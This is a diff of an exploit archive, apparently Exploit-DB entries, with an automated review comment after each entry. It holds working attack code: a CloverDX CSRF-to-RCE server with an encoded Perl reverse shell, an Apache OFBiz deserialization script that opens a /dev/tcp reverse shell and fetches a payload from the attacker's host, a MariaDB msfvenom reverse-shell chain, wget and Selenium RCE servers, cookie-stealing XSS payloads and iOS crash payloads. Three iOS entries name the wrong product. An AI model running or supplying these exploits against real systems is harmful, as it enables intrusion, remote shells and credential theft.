exploits/ios/dos/49953.py Executable file

@ -0,0 +1,35 @@
# Exploit Title: Macaron Notes great notebook 5.5 - Denial of Service (PoC)
# Date: 06-04-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/us/app/macaron-notes-great-notebook/id1079862221
# Version: 5.5
# Category: DoS (iOS)
##### Vulnerability #####
Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")
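Review bot: the Vulnerability line reads `Color Notes is vulnerable to a DoS condition`, carried over from the previous advisory; this file is for Macaron Notes great notebook 5.5, so correct the product name. The script is otherwise identical to the Color Notes one, including the bare `except:` that hides the write error.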

exploits/ios/dos/49954.py Executable file

@ -0,0 +1,35 @@
# Exploit Title: My Notes Safe 5.3 - Denial of Service (PoC)
# Date: 06-04-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/us/app/my-notes-safe/id689971781
# Version: 5.3
# Category: DoS (iOS)
##### Vulnerability #####
Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")
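Review bot: the Vulnerability line again says `Color Notes is vulnerable`, but this advisory is for My Notes Safe 5.3; fix the product name so the file can be read on its own. Same bare `except:` as in the sibling scripts.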

exploits/ios/dos/49979.py Executable file

@ -0,0 +1,35 @@
# Exploit Title: n+otes 1.6.2 - Denial of Service (PoC)
# Date: 06-09-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/us/app/n-otes/id596895960
# Version: 1.6.2
# Category: DoS (iOS)
##### Vulnerability #####
Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")
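Review bot: `Color Notes is vulnerable` should read `n+otes is vulnerable`; the header names n+otes 1.6.2. Same bare `except:` as in the sibling scripts.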

exploits/java/webapps/50131.py Executable file

File diff suppressed because one or more lines are too long

exploits/java/webapps/50166.py Executable file

@ -0,0 +1,137 @@
# Exploit Title: CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) to Remote Code Execution (RCE)
# Date: 14.04.2021
# Exploit Author: niebardzo
# Vendor Homepage: https://www.cloverdx.com/
# Software Link: https://github.com/cloverdx/cloverdx-server-docker
# Version: 5.9.0, 5.8.1, 5.8.0, 5.7.0, 5.6.x, 5.5.x, 5.4.x
# Tested on: Docker image - https://github.com/cloverdx/cloverdx-server-docker
# CVE : CVE-2021-29995
# Replace the target, payload and port to host the exploitation server. Exploit requires, inbound connection to CloverDX
# Victim authenticated to CloverDX and the java to run the ViewStateCracker.java.
# Reference for cracking ViewState:
# https://jazzy.id.au/2010/09/20/cracking_random_number_generators_part_1.html
# https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2
#
import http.server
import socketserver
import requests
from urllib.parse import urlparse
from urllib.parse import parse_qs
from bs4 import BeautifulSoup
import subprocess
import sys
import json
class ExploitHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Content-Type", "text/html; charset=utf-8")
self.end_headers()
# replace with your own target
target = "http://localhost:8080"
query_comp = parse_qs(urlparse(self.path).query)
if "target" in query_comp:
target = query_comp["target"][0]
req = requests.get(target+"/clover/gui/login.jsf")
if req.status_code != 200:
sys.exit(-1)
# parse the reponse retrieve the ViewState
soup = BeautifulSoup(req.text, "html.parser")
cur_view_state = soup.find("input", {"name": "javax.faces.ViewState"})["value"]
# Use the ViewstateCracker.java to get new Viewstate.
new_view_state = subprocess.check_output(["java", "ViewstateCracker.java", cur_view_state])
new_view_state = new_view_state.decode("utf-8").strip()
print(new_view_state)
if new_view_state == "6927638971750518694:6717304323717288036":
html = ("<!DOCTYPE html><html><head></head><body><h1>Hello Clover Admin!</h1><br>"
+ "<script>window.setTimeout(function () { location.reload()}, 1500)</script></body></html>")
else:
html = ("<!DOCTYPE html><html><head>"
+ "<script>"
+ "function exec1(){document.getElementById('form1').submit(); setTimeout(exec2, 2000);}"
+ "function exec2(){document.getElementById('form2').submit(); setTimeout(exec3, 2000);}"
+ "function exec3(){document.getElementById('form3').submit(); setTimeout(exec4, 2000);}"
+ "function exec4(){document.getElementById('form4').submit();}"
+ "</script>"
+ "</head><body onload='exec1();'><h1>Hello Clover Admin! Please wait here, content is loading...</h1>"
+ "<script>history.pushState('','/');</script>"
+ "<form target='if1' id='form1' method='GET' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+ "<form target='if2' id='form2' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
+ "<input type='hidden' value='true' name='javax.faces.partial.ajax'>"
+ "<input type='hidden' value='headerForm&#58;manualListenerItem' name='javax.faces.source'>"
+ "<input type='hidden' value='@all' name='javax.faces.partial.execute'>"
+ "<input type='hidden' value='allContent' name='javax.faces.partial.render'>"
+ "<input type='hidden' value='headerForm&#58;manualListenerItem' name='headerForm&#58;manualListenerItem'>"
+ "<input type='hidden' value='headerForm' name='headerForm'>"
+ "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":","&#58;"))
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+ "<form target='if3' id='form3' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
+ "<input type='hidden' value='true' name='javax.faces.partial.ajax'>"
+ "<input type='hidden' value='manualListeneForm&#58;taskType' name='javax.faces.source'>"
+ "<input type='hidden' value='manualListeneForm&#58;taskType' name='javax.faces.partial.execute'>"
+ "<input type='hidden' value='manualListeneForm&#58;taskFormFragment' name='javax.faces.partial.render'>"
+ "<input type='hidden' value='valueChange' name='javax.faces.behavior.event'>"
+ "<input type='hidden' value='change' name='javax.faces.partial.event'>"
+ "<input type='hidden' value='manualListeneForm' name='manualListeneForm'>"
+ "<input type='hidden' value='shell_command' name='manualListeneForm&#58;taskType_input'>"
+ "<input type='hidden' value='on' name='manualListeneForm&#58;saveRunRecord_input'>"
+ "<input type='hidden' value='true' name='manualListeneForm&#58;manualVariablesList_collapsed'>"
+ "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":","&#58;"))
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+ "<form target='if4' id='form4' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
+ "<input type='hidden' value='true' name='javax.faces.partial.ajax'>"
+ "<input type='hidden' value='manualListeneForm:execute_button' name='javax.faces.source'>"
+ "<input type='hidden' value='@all' name='javax.faces.partial.execute'>"
+ "<input type='hidden' value='rightContent' name='javax.faces.partial.render'>"
+ "<input type='hidden' value='manualListeneForm:execute_button' name='manualListeneForm&#58;execute_button'>"
+ "<input type='hidden' value='manualListeneForm' name='manualListeneForm'>"
+ "<input type='hidden' value='' name='manualListeneForm&#58;properties&#58;propertiesTable&#58;propName'>"
+ "<input type='hidden' value='' name='manualListeneForm&#58;properties&#58;propertiesTable&#58;propValue'>"
+ "<input type='hidden' value='' name='manualListeneForm&#58;taskType_focus'>"
+ "<input type='hidden' value='shell_command' name='manualListeneForm&#58;taskType_input'>"
#
# Below is the HTML encoded perl reverse, replace with your own payload, remember to HTML encode.
#
+ "<input type='hidden' value='&#x70;&#x65;&#x72;&#x6c;&#x20;&#x2d;&#x65;&#x20;&#x27;&#x75;&#x73;&#x65;&#x20;&#x53;&#x6f;&#x63;&#x6b;&#x65;&#x74;&#x3b;&#x24;&#x69;&#x3d;"&#x31;&#x39;&#x32;&#x2e;&#x31;&#x36;&#x38;&#x2e;&#x36;&#x35;&#x2e;&#x32;"&#x3b;&#x24;&#x70;&#x3d;&#x34;&#x34;&#x34;&#x34;&#x3b;&#x73;&#x6f;&#x63;&#x6b;&#x65;&#x74;&#x28;&#x53;&#x2c;&#x50;&#x46;&#x5f;&#x49;&#x4e;&#x45;&#x54;&#x2c;&#x53;&#x4f;&#x43;&#x4b;&#x5f;&#x53;&#x54;&#x52;&#x45;&#x41;&#x4d;&#x2c;&#x67;&#x65;&#x74;&#x70;&#x72;&#x6f;&#x74;&#x6f;&#x62;&#x79;&#x6e;&#x61;&#x6d;&#x65;&#x28;"&#x74;&#x63;&#x70;"&#x29;&#x29;&#x3b;&#x69;&#x66;&#x28;&#x63;&#x6f;&#x6e;&#x6e;&#x65;&#x63;&#x74;&#x28;&#x53;&#x2c;&#x73;&#x6f;&#x63;&#x6b;&#x61;&#x64;&#x64;&#x72;&#x5f;&#x69;&#x6e;&#x28;&#x24;&#x70;&#x2c;&#x69;&#x6e;&#x65;&#x74;&#x5f;&#x61;&#x74;&#x6f;&#x6e;&#x28;&#x24;&#x69;&#x29;&#x29;&#x29;&#x29;&#x7b;&#x6f;&#x70;&#x65;&#x6e;&#x28;&#x53;&#x54;&#x44;&#x49;&#x4e;&#x2c;">&&#x53;"&#x29;&#x3b;&#x6f;&#x70;&#x65;&#x6e;&#x28;&#x53;&#x54;&#x44;&#x4f;&#x55;&#x54;&#x2c;">&&#x53;"&#x29;&#x3b;&#x6f;&#x70;&#x65;&#x6e;&#x28;&#x53;&#x54;&#x44;&#x45;&#x52;&#x52;&#x2c;">&&#x53;"&#x29;&#x3b;&#x65;&#x78;&#x65;&#x63;&#x28;"&#x2f;&#x62;&#x69;&#x6e;&#x2f;&#x73;&#x68;&#x20;&#x2d;&#x69;"&#x29;&#x3b;&#x7d;&#x3b;&#x27;' name='manualListeneForm&#58;shellEditor'>"
+ "<input type='hidden' value='' name='manualListeneForm&#58;workingDirectory'>"
+ "<input type='hidden' value='10000' name='manualListeneForm&#58;timeout'>"
+ "<input type='hidden' value='true' name='manualListeneForm&#58;scriptVariablesList_collapsed'>"
+ "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":","&#58;"))
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+ "<iframe name='if1' style='display: hidden;' width='0' height='0' frameborder='0' ></iframe>"
+ "<iframe name='if2' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
+ "<iframe name='if3' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
+ "<iframe name='if4' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
+ "</body></html>")
self.wfile.write(bytes(html,"utf-8"))
base64_enc_viewstatecracker = "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"
#
# This drops ViewstateCracker.java from above, ref: https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2
#
with open("ViewstateCracker.java","w") as f:
f.write(b64decode(bytes(base64_enc_viewstatecracker, 'utf-8')).decode('utf-8'))
exploit_handler = ExploitHandler
PORT = 6010
exploit_server = socketserver.TCPServer(("", PORT), exploit_handler)
exploit_server.serve_forever()
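Review bot: `sys.exit(-1)` inside `do_GET`, right after the `requests.get(target+"/clover/gui/login.jsf")` call, terminates the whole `TCPServer` process on any non-200 reply instead of answering the browser with an error, while the unguarded `check_output` and `BeautifulSoup` lookups only raise exceptions that `socketserver` logs and swallows, so failures surface inconsistently; return a 502 in both cases. The `target` value is taken unvalidated from the query string and interpolated into the served HTML, so the listener on `PORT = 6010` must only be reachable from the tester's own browser; say so in the header. For the defender's side, the observable is the chain of cross-origin POSTs to `/clover/gui/event-listeners` carrying `manualListeneForm:taskType_input=shell_command` and a `manualListeneForm:shellEditor` body; noting that server-side logging of those parameters is the detection hook would make the entry more useful.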

exploits/java/webapps/50178.sh Executable file

@ -0,0 +1,78 @@
# Exploit Title: ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments
# Date: 2021-08-04
# Exploit Author: Álvaro Muñoz, Adrián Díaz (s4dbrd)
# Vendor Homepage: https://ofbiz.apache.org/index.html
# Software Link: https://archive.apache.org/dist/ofbiz/apache-ofbiz-17.12.01.zip
# Version: 17.12.01
# Tested on: Linux
# CVE : CVE-2020-9496
# Reference: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/
# Description: This CVE was discovered by Alvaro Muñoz, but I have created this POC to automate the process and the necessary requests to successfully exploit it and get RCE.
#!/usr/bin/env bash
# Because the 2 xmlrpc related requets in webtools (xmlrpc and ping) are not using authentication they are vulnerable to unsafe deserialization.
# This issue was reported to the security team by Alvaro Munoz pwntester@github.com from the GitHub Security Lab team.
#
# This vulnerability exists due to Java serialization issues when processing requests sent to /webtools/control/xmlrpc.
# A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation would result in arbitrary code execution.
#
# Steps to exploit:
#
# Step 1: Host HTTP Service with python3 (sudo python3 -m http.server 80)
# Step 2: Start nc listener (Recommended 8001).
# Step 3: Run the exploit.
url='https://127.0.0.1' # CHANGE THIS
port=8443 # CHANGE THIS
function helpPanel(){
echo -e "\nUsage:"
echo -e "\t[-i] Attacker's IP"
echo -e "\t[-p] Attacker's Port"
echo -e "\t[-h] Show help pannel"
exit 1
}
function ctrl_c(){
echo -e "\n\n[!] Exiting...\n"
exit 1
}
# Ctrl + C
trap ctrl_c INT
function webRequest(){
echo -e "\n[*] Creating a shell file with bash\n"
echo -e "#!/bin/bash\n/bin/bash -i >& /dev/tcp/$ip/$ncport 0>&1" > shell.sh
echo -e "[*] Downloading YsoSerial JAR File\n"
wget -q https://jitpack.io/com/github/frohoff/ysoserial/master-d367e379d9-1/ysoserial-master-d367e379d9-1.jar
echo -e "[*] Generating a JAR payload\n"
payload=$(java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "wget $ip/shell.sh -O /tmp/shell.sh" | base64 | tr -d "\n")
echo -e "[*] Sending malicious shell to server...\n" && sleep 0.5
curl -s $url:$port/webtools/control/xmlrpc -X POST -d "<?xml version='1.0'?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns='http://ws.apache.org/xmlrpc/namespaces/extensions'>$payload</serializable></value></member></struct></value></param></params></methodCall>" -k -H 'Content-Type:application/xml' &>/dev/null
echo -e "[*] Generating a second JAR payload"
payload2=$(java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "bash /tmp/shell.sh" | base64 | tr -d "\n")
echo -e "\n[*] Executing the payload in the server...\n" && sleep 0.5
curl -s $url:$port/webtools/control/xmlrpc -X POST -d "<?xml version='1.0'?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns='http://ws.apache.org/xmlrpc/namespaces/extensions'>$payload2</serializable></value></member></struct></value></param></params></methodCall>" -k -H 'Content-Type:application/xml' &>/dev/null
echo -e "\n[*]Deleting Files..."
rm ysoserial-master-d367e379d9-1.jar && rm shell.sh
}
declare -i parameter_enable=0; while getopts ":i:p:h:" arg; do
case $arg in
i) ip=$OPTARG; let parameter_enable+=1;;
p) ncport=$OPTARG; let parameter_enable+=1;;
h) helpPanel;;
esac
done
if [ $parameter_enable -ne 2 ]; then
helpPanel
else
webRequest
fi
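Review bot: `getopts ":i:p:h:"` declares `-h` as taking an argument, so a bare `-h` is reported as a missing-argument error instead of reaching `helpPanel`, and the `case $arg` block has no `\?` or `:` branch; use `":i:p:h"` and handle the error cases. `url` and `port` are hardcoded with `# CHANGE THIS` rather than exposed as options, and the `#!/usr/bin/env bash` line sits below the header comments, so it is not an effective shebang for `./50178.sh`. The script also fetches `ysoserial` from jitpack.io at run time and deletes it afterwards; pin and document that dependency. On the documentation side the header names the advisory (GHSL-2020-069) but no fixed OFBiz release, which is what a reader assessing exposure needs; for detection, an unauthenticated POST to `/webtools/control/xmlrpc` whose body contains a `<serializable xmlns='http://ws.apache.org/xmlrpc/namespaces/extensions'>` element is the thing to alert on.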


@ -0,0 +1,20 @@
# Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution
# Date: 03/18/2021
# Exploit Author: Central InfoSec
# Version: MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL
# Tested on: Linux
# CVE : CVE-2021-27928
# Proof of Concept:
# Create the reverse shell payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so
# Start a listener
nc -lvp <port>
# Copy the payload to the target machine (In this example, SCP/SSH is used)
scp CVE-2021-27928.so <user>@<ip>:/tmp/CVE-2021-27928.so
# Execute the payload
mysql -u <user> -p -h <ip> -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'
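Review bot: the header does not state the preconditions: `SET GLOBAL wsrep_provider` requires a database account holding the SUPER privilege (the CVE-2021-27928 description scopes the issue to a SUPER user), and the `.so` must already be on the server's filesystem, which is why the `scp` step needs a separate shell or file-write path onto the host; add both. The affected ranges in the Version line imply the fixed releases (10.2.37, 10.3.28, 10.4.18, 10.5.9), but naming them explicitly and noting that restricting SUPER is the interim mitigation would make the entry actionable. The Date line also uses `03/18/2021` while the neighbouring entries use ISO dates.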

exploits/linux/local/50236.py Executable file

File diff suppressed because one or more lines are too long

@ -0,0 +1,57 @@
# Exploit Title: Mini-XML 3.2 - Heap Overflow
# Google Dork: mxml Mini-xml Mini-XML
# Date: 2020.10.19
# Exploit Author: LIWEI
# Vendor Homepage: https://www.msweet.org/mxml/
# Software Link: https://github.com/michaelrsweet/mxml
# Version: v3.2
# Tested on: ubuntu 18.04.2
# 1.- compile the Mini-XML code to a library use compile line"clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link".
# 2.- compile my testcase and link them to a binary use compile line "clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer". In my testcase, I use the API "mxmlLoadString" to parse a string.
# 3.- run the binary for a short time.crash. because the "mxml_string_getc" didn't versify the string's length and cause buffer-overflow.
# 4.- Here are the crash backtrace.
=================================================================
==6265==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000000a73 at pc 0x000000558e2d bp 0x7ffe13e2caa0 sp 0x7ffe13e2ca98
READ of size 1 at 0x612000000a73 thread T0
#0 in mxml_string_getc /opt/mnt/software/mxml32/mxml-file.c:2422:13
#1 in mxml_load_data /opt/mnt/software/mxml32/mxml-file.c:1558:20
#2 in mxmlLoadString /opt/mnt/software/mxml32/mxml-file.c:180:11
#3 in LLVMFuzzerTestOneInput /opt/mnt/software/mxml32/mxml_fuzzer.cpp:12:8
#4 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x42f357)
#5 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x41f7ea)
#6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/mnt/software/mxml32/a.out+0x42a7b0)
#7 in main (/opt/mnt/software/mxml32/a.out+0x41d4b2)
#8 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
#9 in _start (/opt/mnt/software/mxml32/a.out+0x41d529)
# 6.- Here are my testcase.
#include <string>
#include <vector>
#include <assert.h>
#include "mxml.h"
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
std::string c(reinterpret_cast<const char *>(data), size);
char *ptr;
mxml_node_t *tree;
tree = mxmlLoadString(NULL, c.c_str(), MXML_NO_CALLBACK);
if(tree){
ptr = mxmlSaveAllocString(tree, MXML_NO_CALLBACK);
if(!ptr) assert(false);
mxmlDelete(tree);
}
return 0;
}
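Review bot: `ptr` returned by `mxmlSaveAllocString` is never `free`d, so under `-fsanitize=address` every iteration leaks and LeakSanitizer output can obscure the heap-buffer-overflow the report is about; free it before `mxmlDelete(tree)`. The harness also includes `<vector>` without using it and relies on `<string>` to pull in `uint8_t` and `size_t`; include `<cstdint>` and `<cstddef>` directly. On the report side, the numbered steps jump from 4 to 6, no crashing input is included so the result cannot be reproduced from this file alone, and the header carries no reference or fixed version; the frame `mxml_string_getc mxml-file.c:2422` is the only locator a maintainer gets.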

exploits/linux/remote/49815.py Executable file

@ -0,0 +1,54 @@
# Exploit Title: GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2)
# Original Exploit Author: Dawid Golunski
# Exploit Author: liewehacksie
# Version: GNU Wget < 1.18
# CVE: CVE-2016-4971
import http.server
import socketserver
import socket
import sys
class wgetExploit(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
# This takes care of sending .wgetrc/.bash_profile/$file
print("We have a volunteer requesting " + self.path + " by GET :)\n")
if "Wget" not in self.headers.get('User-Agent'):
print("But it's not a Wget :( \n")
self.send_response(200)
self.end_headers()
self.wfile.write("Nothing to see here...")
return
self.send_response(301)
print("Uploading " + str(FILE) + "via ftp redirect vuln. It should land in /home/ \n")
new_path = 'ftp://anonymous@{}:{}/{}'.format(FTP_HOST, FTP_PORT, FILE)
print("Sending redirect to %s \n"%(new_path))
self.send_header('Location', new_path)
self.end_headers()
HTTP_LISTEN_IP = '192.168.72.2'
HTTP_LISTEN_PORT = 80
FTP_HOST = '192.168.72.4'
FTP_PORT = 2121
FILE = '.bash_profile'
handler = socketserver.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
print("Ready? Is your FTP server running?")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((FTP_HOST, FTP_PORT))
if result == 0:
print("FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT))
else:
print("FTP is down :( Exiting.")
exit(1)
print("Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT)
handler.serve_forever()
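Review bot: in the non-Wget branch `self.wfile.write("Nothing to see here...")` passes a `str` to a binary stream, which raises `TypeError` on Python 3; write bytes instead. `self.headers.get('User-Agent')` can be `None`, so the `in` test raises when a client sends no User-Agent, and the module-level `exit(1)` should be `sys.exit(1)` since `sys` is already imported. `HTTP_LISTEN_IP`, `FTP_HOST` and `FTP_PORT` are hardcoded lab values and should be documented as parameters. The header gives only `< 1.18` as fix information; the point for a reader assessing exposure is that 1.18 stopped taking the local filename from the redirect target, which is why a current wget following the HTTP-to-FTP 301 here no longer writes `.bash_profile`.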

exploits/linux/webapps/49915.rb Executable file

@ -0,0 +1,79 @@
# Exploit Title: Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver)
# Date: 2021-05-27
# Exploit Author: Jon Stratton
# Vendor Homepage: https://www.selenium.dev/
# Software Link: https://selenium-release.storage.googleapis.com/3.141/selenium-server-standalone-3.141.59.jar
# Version: 3.141.59
# Tested on: Selenium Server 3.141.59, webdriver, geckodriver
#
# https://github.com/JonStratton/selenium-node-takeover-kit/blob/master/examples/selenium_node_rce.rb
#
# When Selenium runs, it creates a custom profile (in /tmp/ for Linux) on the Node. This profile then gets overwritten by a possible overlay that is sent in a base64 encoded zip file when a Selenium session is started.
#
# One of the config file can be used to set a custom handler (which do things like, for instance, associates “mailto:blah@blah.com” to your email client). In this example, a new handler is created for “application/sh” that will execute the argument with “/bin/sh”
#
# Side notes, this profile doesn't safely unzip. So this can be used to write files to the file-system.
#
# The Payload is encoded and embedded as inline data associated with the "application/sh" mime type.
#!/usr/bin/env ruby
require 'optparse'
require 'net/http'
require 'json'
require 'uri'
require 'zip'
require 'base64'
options = {}
OptionParser.new do |opts|
opts.banner = 'Usage: example.rb [options]'
opts.on('-hURL', '--hubURL', 'Selenium Hub URL') do |h|
options[:hub] = h
end
opts.on('--help', 'Prints this help') do
puts opts
exit
end
end.parse!
hub_url = options[:hub]
payload = 'rm -rf $0
echo success > /tmp/selenium_node_rce.txt'
# Build profile zip file.
stringio = Zip::OutputStream::write_buffer do |io|
# Create a handler for shell scripts
io.put_next_entry("handlers.json")
io.write('{"defaultHandlersVersion":{"en-US":4},"mimeTypes":{"application/sh":{"action":2,"handlers":[{"name":"sh","path":"/bin/sh"}]}}}')
end
stringio.rewind
encoded_profile = Base64.strict_encode64(stringio.sysread)
# Create session with our new profile
newSession = {:desiredCapabilities => {:browserName => "firefox", :firefox_profile => encoded_profile}}
uri = URI.parse(hub_url)
http = Net::HTTP.new(uri.host, uri.port)
# Start session with encoded_profile and save session id for cleanup.
uri = URI.parse("%s/session" % [hub_url])
request = Net::HTTP::Post.new(uri.request_uri, 'Content-Type' => 'application/json')
request.body = JSON.generate(newSession)
response = http.request(request)
sessionId = JSON.parse(response.body)["value"]["sessionId"]
# URL.
data_url = "data:application/sh;charset=utf-16le;base64,%s" % [Base64.encode64(payload)]
uri = URI.parse("%s/session/%s/url" % [hub_url, sessionId])
request = Net::HTTP::Post.new(uri.request_uri, 'Content-Type' => 'application/json')
request.body = JSON.generate(:url => data_url)
response = http.request(request)
# End session(not working)
uri = URI.parse("%s/session/%s" % [hub_url, sessionId])
request = Net::HTTP::Delete.new(uri.request_uri)
http.request(request)
exit
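Review bot: `hub_url` is never checked, so running without `-h` fails inside `URI.parse(nil)` instead of printing the usage banner; validate `options[:hub]` before use. `require 'zip'` comes from the `rubyzip` gem, which the header should list as a dependency, and the trailing `exit` after the DELETE is redundant. The comment `# End session(not working)` should say what fails so a reader can tell whether the session lingers as an artifact on the node. The commentary already notes that the overlay zip is not safely extracted; for the defender's side the header should say plainly that anyone who can POST to `/session` on the hub gets code execution on the node, so the mitigation is network restriction and authentication in front of the grid, not anything in this script.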


@ -0,0 +1,27 @@
# Exploit Title: Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)
# Date: 06/05/2021
# Exploit Author: CAPTAIN_HOOK
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/jira/download/data-center
# Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1
# Tested on: ANY
# CVE : CVE-2021-26078
Description:
The number range searcher component in Jira Server and Jira Data Center before version 8.5.14, from version 8.6.0 before version 8.13.6, and from version 8.14.0 before version 8.16.1 allows remote attackers inject arbitrary HTML or JavaScript via across site scripting (XSS) vulnerability
*Fixed versions:*
- 8.5.14
- 8.13.6
- 8.16.1
- 8.17.0
POC:
- *Story points* custom field that exists by default in all JIRA Server has 3 types of Search template ( None , number range searcher, number searcher) By default the value of Search template is number range searcher OR number searcher. if the value of Search template was set on number range searcher the JIRA server is vulnerable to XSS attack by lowest privilege . For Testing Check the Story points custom field and it's details ( for verifying that the Search template sets on number range searcher) with your ADMIN account ( just like the images) and in the other window Type this With your least privilege
user : jql=issuetype%20%3D%20Epic%20AND%20%22Story%20Points%22%20%3C%3D%20%22%5C%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E%22%20AND%20%22Story%20Points%22%20%3E%3D%20%221%22
Your XSS Will be triggered immediately.
Reference:
https://jira.atlassian.com/browse/JRASERVER-72392?error=login_required&error_description=Login+required&state=9b05ec1f-587c-4014-9053-b6fdbb1efa21
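Review bot: the Reference URL carries a login-redirect state (`?error=login_required&error_description=Login+required&state=...`) that belongs to one browser session; trim it to `https://jira.atlassian.com/browse/JRASERVER-72392`. The POC refers to verifying the Search template "just like the images", but no images are included in the entry, so describe the admin-side check in text, and the single run-on POC paragraph would read better as numbered steps like the other entries use. The fixed-version list is the useful part for readers assessing exposure and is complete.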


@ -0,0 +1,37 @@
# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Multiple Stored Cross-Site Scripting
# Date: 30-12-2020
# Exploit Author: Mesut Cetin
# Vendor Homepage: http://egavilanmedia.com
# Version: 1.0
# Tested on Windows 10, Firefox 83.0, Burp Suite Professional v1.7.34
Vulnerable parameter: email, gender, username
Payload: <script>alert(document.cookie)</script>
Proof of Concept:
To bypass client-side filter, we will use Burp Suite. Reproduce the vulnerability by following the steps:
1. Login with default credentials "admin:password" at the demo page at: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile.php
2. Click above right on the "Profile" tab
3. Navigate to the "Edit Profile" tab
4. In Firefox, use Foxyproxy and click on "Intercept" within Burp Suite. Press on "Update password" button at demo page.
5. Capture the POST request in Burp Suite and manipulate the parameter as shown:
POST /User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/admin/profile_action.php HTTP/1.1
Host: demo.egavilanmedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
